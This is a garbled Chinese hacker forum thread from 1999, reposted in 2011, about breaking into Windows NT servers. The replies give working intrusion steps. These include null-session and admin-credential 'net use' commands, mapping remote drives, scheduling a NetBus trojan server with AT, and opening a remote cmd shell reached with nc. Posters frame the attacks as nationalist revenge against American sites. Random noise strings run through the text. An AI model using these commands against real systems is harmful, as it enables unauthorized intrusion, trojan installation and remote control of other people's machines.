《版主頁黑客工具和文章的幾個問題》中提到:0 k/ B/ o. ^" t: u- ?. y6 d
請教,從版主頁上載得PINGER��,GRINDER�����,LETMEIN等,卻不能用����,PINGER安裝后,明明安裝前文件有1M多�����,但安裝完后生成的文件夾中只有PINGER�����。EXE�����,40多K�,運行PINGER,設置好IP����,點PING,彈出一個窗口(C++��。。����。),說出錯�����,然后關閉了���,何故,是不是安裝有誤�? 2。運行LETMEIN��,彈出以下錯誤:連接文件LETMEIN��。EXE到不存在的NETAPI32���。DLL����;NETGROUPGETUSERS����。 是否說明需要NETAPI32���。DLL文件,哪里有該DLL�����。 3�����。USAKILLER 的教學文章中提到需在WINNT4�����。0下運行以下步驟等���,是否要求我的操作系統(tǒng)也是WINNT4����。0 �,應該不是吧? 4����。NC FOR NT 是否要求我的操作系統(tǒng)為NT�,還是服務器的操作系統(tǒng)為NT��? 太多的問題需高手回答�,我花那么多的時間和金錢下載這幾M文件卻不能用,實在窩囊哦���, 強烈建議USAKILLER 等高手級的黑客寫更多的教學文章��,以提高我國黑客水平�。) P' l* d$ m4 f! C9 E% {$ K
> 我的機子MMX166���,WIN98,2��。5G���,32M內存�。
1 U H. ?: x+ a# D
0 R- g+ F+ h8 k黑客并不神秘�,你只要了解操作系統(tǒng),學習一些操作系統(tǒng)的弱點�����,輔助相關的工具,就可以成功���。
u( B( k) ~- N! D8 T2 @你的問題是��,pinger, grinder, letmein等工具必須要在NT上運行�,我們強烈建議�����,你一定要安裝NT�,對于你的機器配制,和我們現(xiàn)在差不多����,只是比你多了32M內存,2G硬盤���。0 d. U, U" Z9 {: G8 |" q1 P
其實����,攻擊敵站����,利用其操作系統(tǒng)本身的工具就可以了���,比如,我們在NT上攻擊某服務器��,該服務器為NT4.0��,我們將做如下簡單事情就有可能成功�����,假設目標NT的IP地址為111.111.111.111���,做法如下:6 L4 ~* a' p. }4 R9 Y
net use \\111.111.111.111\ipc$ "" /user:""
: h$ V1 k- V5 v/ Znet.exe是NT的工具文件��,該命令將和目標服務器建立Null Session�����,如果成功,你可以查看該服務器上的共享目錄:
6 z8 b H2 K" i! h; O/ U* @net view \\111.111.111.111: p, \& J0 V8 L( Z
當然����,如果你有該NT管理員密碼����,就更好辦了�����,假設其管理員Admin密碼為fuck:9 D% \* r& g L, o
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
& n8 N% }6 m3 r$ y命令成功后���,幾乎所有目標NT上的配制�,資源�,你都可以在你本地NT上連接遠程計算機來查看或修改:3 g; f: r4 V) k c2 }' T
1、查看或修改遠程機器上的硬盤�����,假如目標NT上有C��、D兩個硬盤:6 G7 M' N9 C) M8 h7 H
net use x: \\111.111.111.111\c$2 ]+ R' x6 j& @8 I/ E' ~" H) k
net use y: \\111.111.111.111\d$
& W" ~; G) W2 ]4 q/ x, k這樣�����,目標NT上的C����、D盤分別被影射為你本地的X��、Y盤��,你想怎么做都可以...
7 C1 f/ T9 [6 u6 ^2����、管理目標NT的用戶:& D1 V( `% X6 y( K$ w# W! {7 r$ Y; B
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”
* u! N9 H. l! ^. M鍵入\\111.111.111.111后��,目標NT上的所有用戶你想怎么做都可以��,和管理你本地的一樣' W) @: U! _3 P
3����、管理目標NT的服務
9 m) n& v% D7 U* _選擇“管理工具(公用)”->“服務器管理”->“計算機”->“選擇域”- n9 a6 D0 e* t7 D M
這樣你可以管理目標NT上的服務,共享目錄; O8 m" Q+ t: x7 ]; z7 s7 T
4���、IIS管理
; Z) Z' ?6 q( U選擇“Microsoft Internet Service管理”->“Internet 服務管理器”->"連接到服務器"->111.111.111.111
9 N, h1 p4 Z( b: n9 e目標NT的FTP�����、WWW服務你就可以重新配置
: R! @4 \' ]" @5���、事件管理
7 |* I2 q% u7 M$ Z) ~, K. q“事件查看器”->連接到服務器->111.111.111.1111 S6 ?& @: ^$ T: x6 v: T
0 Z! H$ ^. s( S: t. K9 w/ n! A還有更多的東西���,都可以用NT本身的功能來完成�,這些都是95, 98所不能實現(xiàn)的。# G! N2 b3 J; Z: L; h3 s+ }1 ~
0 {2 c3 j. _8 g; C7 B" x: I p7 o
當然�,98,95也能做一些事情,但很麻煩�,比如:/ |/ g9 U; h* S' d4 I! d
net use \\111.111.111.111\ipc$
- M- K; A' h6 n1 S6 u G9 J0 }net use z: \\111.111.111.111\d$% s3 F: R+ X2 f1 }$ M4 ]
但其后不能帶參數(shù),即改用其他用戶或密碼��,系統(tǒng)將用當前用戶和密碼去登錄���,如果你知道目標NT的用戶或密碼���,重新啟動95, 98,改用該用戶和密碼登錄�����,方可實現(xiàn)�����,你可以連接目標NT上的共享資源��,但不能進行管理,如用戶����、事件等! o6 u6 G% ]% Z" g) s; k
2 i1 v( x6 v, _2 ]7 N& Z& j [+ E+ m9 v
我們強烈建議各位有心要為死難者報仇,真正的想黑霉國的站點����,花點時間,裝個NT吧�����,NT Workstation也可以����!
1 Q% p* R0 }( L/ P7 j" ]) I4 H這樣,你還可以了解目標機器上能有什么東東供你去用�����!- p& v* O# o- E' }5 n
: S, Z3 S6 P3 o; E
5 Z3 g" @! M8 s+ s-------------------------------------------------------------------------------- s% I4 G3 s$ x+ c
$ u- U, _- B$ P3 e. L3 M>quack于1999-06-12����,23:37:44% l9 g( j3 k# R! }( W
在大作《幾個有關黑的問題》中提到:; p0 U$ v1 L0 g+ e# N
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!。
: v2 L, ^, \; U+ X/ T- m+ ?
6 r1 ]. J; n7 i/ R( u) f; k3 bkillusa于1999-06-13��,03:25:15; ~9 D, u( E) n$ }! i' ]& H
在大作《Re: 幾個有關黑的問題》中提到:- l! j6 z& D) c% j
- N1 O' Z! C2 @letmein.exe 暫時沒有mypwd參數(shù),十分抱歉 ]9 c5 Q7 D$ I9 s7 y
pinger程序�,只是利用ping來尋找主機���,每臺NT服務器有一個主IP地址�,但也可以設置多個輔助IP地址���,比如有些服務器供應商�,一臺NT服務器上可以設置一千多個IP�����,每個IP對應一個Hostname,而真正能找到主機名的只有一個IP地址��,就是該主機的主IP地址���,所以有時顯示只有IP����,而無主機名�����。另外,有些服務器是非NT的操作系統(tǒng)��,有時將不會顯示主機名�����。當然����,有時在服務器上進行一些設置,也會出現(xiàn)上面的情況�。
+ ]8 h9 d/ [' N. H; M* K* f
$ C9 m+ i1 } u) e# ]; k1 a$ Z3 h5 oNetbus分客戶端程序ntsrv.exe和服務器端netbus.exe兩個程序,所以����,netbus.exe是不用上傳的,只需在目的
& s Y" F8 c; \0 m. k: e4 m, A服務器上運行ntsrv.exe����,而在目的服務器運行該程序有很多種方法:
' H7 n- |, e4 F' X) e' B7 c
9 E6 X2 [' ]6 [! H1、利用服務器的 Schedule 服務來啟動schedule 服務是指在服務器上定時運行某程序����,具體使用方法,可在自己的NT Dos窗口下鍵入以下:2 N5 \7 v4 A. j% e+ i" X; l
; C" _% v% R# yC:\>net start schedule
& @* K# O! L+ Y/ v! G: q% _% ?5 jSchedule 正在啟動服務...../ C3 B# f4 l* K2 U' H' ]& Y
Schedulw 服務啟動成功��。
- Z6 z' S* y" i( u* c, zC:\>at /?
6 _. [/ j- I9 m6 i; ZAT 命令排定在特定的日期和時間運行某些命令和程序。
& Q/ r# T& R4 F; o運行 AT 命令之前必須先啟動 Schedule 服務�����。
' Y0 P1 F/ ]% W( X, |: t5 c$ f2 i* h! x* \; O9 C+ ?
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]; Y6 X [' j6 \0 l' E2 l
AT [\\computername] time [/INTERACTIVE]
. O: H) J* y; b8 o. w[ /EVERY:date[,...] | /NEXT:date[,...]] "command"" g: {; @6 p( S' F7 I
! V# H# T( W3 W
\\computername 指定遠程計算機�����。 如果省略這個參數(shù)
5 M, n; U1 p0 U0 v f命令會被排定在本機上運行���。
7 \% y, N5 y; M2 m3 ~id 指定給排定進度命令的識別號。
$ n+ i! y9 p7 u8 X4 }# I
8 `( U y0 K8 R# m) W5 W0 y/delete 刪除某個已排定進度的命令�����。如果省略標識���,計算機上所有已排定進度的命令都會被刪除���。2 u: o& D, S l1 ]
/yes 用于刪除所有作業(yè),且不想在運行刪除時顯示確認信息 ���。7 r- g t& w X$ N; C* f6 k. Y
time 指定命令運行的時間�。, z: K! F8 ]9 z+ I; L/ q
/interactive 允許作業(yè)在運行時,與用戶通過桌面交互�����。
7 T8 B/ \* c' i& I F- {/ F$ h* H% b" U# R& |
/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令���。6 ?1 P* I2 t# `6 \1 K5 l# Q
如果省略日期�����,則默認為在每月的本日運行�����。( Y$ N9 c0 s& _7 ~# S
) f" \' J/ @, h0 F# W
/next:date[,...] 指定在下一個指定日期 (如�����,下周三)���,運行命令。如果省略日期���,則默認為在每月的本日運行�。; D: c5 ?) }2 r0 J
4 ^( `3 Q* Y+ z! e( l8 J6 u) P6 ^"command" 準備運行的 Windows NT 命令或批處理文件。1 W& T4 Z3 D4 G N; }
! Y5 v0 ` s" H8 g- t% pC:\>
3 M8 |$ A' E4 H6 I3 G; n( V5 C! H5 W+ u$ t H
知道了如何使用AT��,再來看看如何在遠程NT上運行ntsrv.exe:
2 O' L+ i* V# x c# u; i( `1 利用管理員登陸到目的服務器�,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
, L+ n% T# A e% H* R y2 利用ntsrv.exe啟動遠程: netsvc \\x.x.x.x schedule /start# ^( @' A) e i5 |0 B, C/ C! t
3 利用AT.EXE在遠程服務器設置程序定時運行,當然最快運行最理想���,所以�����,你可以用letmein.exe得到服務器的時間,然后:
! Z7 c2 C( |+ b, `# b8 g4 _at \\x.x.x.x 00:00 ntsrv.exe /port:643213 _' j, c% T+ r" l5 @: Z
其中00:00要改為用letmein.exe得回來的具體時間+一點容量����,等一會后,再在本地啟動netbus.exe�����,鍵入目的服務器得ip地址或hostname����,連接!具體使用可參照 "How to get in nt"��,比如第一種方法,你想要在目的服務器運行 LEGION����,可以利用netbus得上傳功能,將LEGION上傳至目的服務器��,再用netbus的"Start program"��,鍵入完整路徑的LEGION運行程序����,就ok了!第二種方法是利用netbus的“App redirect”功能��,啟動遠程telnet服務�,如下:在netbus中擊“App redirect”,鍵入"C:\>winnt\system32\cmd.exe"�����,Port為:4321����,服務就啟動了,然后在本地運行:nc x.x.x.x 4321����,出現(xiàn)dos啟動的畫面就表示連接成功:9 w4 R0 f1 Z9 N9 R" R- B# H! c) _
Microsoft(R) Windows NT(TM)
# }8 I9 V, f# Q7 z(C) Copyright 1985-1996 Microsoft Corp.% ?' Y' H& U; ^# Z; @8 P
C:\>( f# M V" u" b% H
- A( M# z4 E, Z( m
2�、利用web啟動ntsrv.exe或其他程序在目的服務器1 h: s7 t8 q5 L
% Z/ [1 C5 W( y+ x# I. R2 ^" @將ntsrv.exe 或其他運行程序Copy到目的服務器的www可執(zhí)行目錄��,如cgi-bin或scripts���,然后在瀏覽器鍵入url如:
. W# Q! K9 E/ y- c7 q+ j/ {+ H( khttp://x.x.x.x/scripts/ntsrv.exe /port:643211 ?& G7 p3 J4 c7 H; Z; U
或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321 _; B0 T, b& V4 u' U3 `
該程序就啟動了
1 ]5 d( Q, h D3 Q" G5 E. m( u' |7 p8 }
我只提這幾中方法�����!
# l5 M2 J1 h7 `$ f! Y( A4 B/ n1 R; ]" _要成功�����,必須打好基礎工,對操作系統(tǒng)充分了解!
* X- _* \6 e! A- L
) G+ d& v' `7 t( X$ ~ |
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡